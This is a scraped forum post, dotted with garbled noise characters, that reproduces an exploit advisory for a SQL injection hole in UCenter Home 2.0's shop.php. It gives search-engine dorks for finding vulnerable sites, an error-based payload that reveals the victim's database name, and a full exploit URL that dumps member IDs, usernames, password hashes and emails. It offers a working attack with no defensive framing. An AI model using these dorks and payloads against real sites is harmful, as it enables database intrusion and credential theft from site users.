: ]8 H2 _' ?' p" E& b__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
3 q/ w t* t# @/ `% {! k% V3 J- H' _! s/ k
5 S E1 f7 T% K8 \% C7 \, ^. ?
* x/ v" l5 w9 r*/ Author : KnocKout 7 e. x8 \* D9 L5 A. {+ g( h6 U
. {( ]/ i. c/ c' F*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
o% x3 `# f7 Q$ i) o5 `+ K
, G: d' c% \: X7 W*/ Contact: knockoutr@msn.com ! ?/ p$ f W3 s; D
; L; a- W' a) ]& L
*/ Cyber-Warrior.org/CWKnocKout
/ h3 X' \" K& F0 K
# P1 }: |; S. I. r__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 U4 X' G2 r4 K' T
; j. }- e! ^+ b# r7 e S* Z( B
Script : UCenter Home 9 F" U3 O! Z+ a: | F/ s1 A# P
/ R* J: Q( q& W8 p6 j7 u' i
Version : 2.0
+ E# a9 R4 U1 K% v* W$ n
$ n: m4 F; q* K/ aScript HomePage : http://u.discuz.net/
' O4 \9 `7 \2 e7 B1 W# z6 I/ V; \! R7 M- I% O2 K% @ M' Q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( r8 @9 I$ L" S4 }
+ y: X5 c' H# U" S
Dork : Powered by UCenter inurl:shop.php?ac=view % G* R' P4 D$ N3 I& b
3 ] t- F% W$ ?+ e
Dork 2 : inurl:shop.php?ac=view&shopid= 8 q; o0 x! c1 L& L }: F& j' Y
' T0 D) M8 R d: s% I; \2 Y h
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : y+ y$ V' |4 T: e- H* t8 S
& j* y, Z( f; \4 rVuln file : Shop.php
- ]6 k2 t4 ^# Z
7 `3 S5 l: R# E6 G+ jvalue's : (?)ac=view&shopid=
& a! | j& w- k; y+ ^
8 F$ S' `( B4 R9 a' s3 F& ~! MVulnerable Style : SQL Injection (MySQL Error Based)
3 t! N: J+ W0 C$ u6 e
) `. }% W& ]' C* L' w7 _3 q/ y1 D gNeed Metarials : Hex Conversion
# @8 |, I3 P( s$ Z3 K8 P
8 B' l/ `8 j% P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * h% r p7 u, N. p$ Y
9 r4 I2 @, K( ^, f+ ZYour Need victim Database name.
% l% V" e) n5 B! T2 I, A4 N0 y$ U5 m- Y: y9 S6 X7 U
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ; V* }$ t! V: `# u
' M/ Z) L5 h$ j2 A% _6 I- U9 X- e* k) `4 z.. 1 ?+ a3 b. f, w$ p7 F' N$ _" |2 i
, u2 G( ?5 L2 O8 g6 [; S: Z7 WDB : Okey.
3 w( c; K- Q. E) ?# c( }' a9 `' q' c
9 w2 z# U% P" P& m7 M* y$ M( @your edit DB `[TARGET DB NAME]` 4 K& x; ?/ q( Z7 z8 M- s
: k6 H' k1 y! N) a5 F$ @ ~
Example : 'hiwir1_ucenter' + h7 Z- [1 K/ _0 A4 E
, h5 i, O2 I) V9 i" c7 xEdit : Okey. $ w5 N6 [7 L4 E0 ]( b5 Q
1 V5 O5 t# k Q1 q2 v/ k/ [- BYour use Hex conversion. And edit Your SQL Injection Exploit.. 0 _' B/ } k$ }( b. s( s0 y9 D/ |
5 y. K% @6 R' }" o9 e
) w- A/ S1 }( o% K
! Q( \6 |' g5 F, ~& c" kExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1 f; H2 N5 w7 X, R2 R |
发表于 2013-2-27 21:31:31
收藏
支持
反对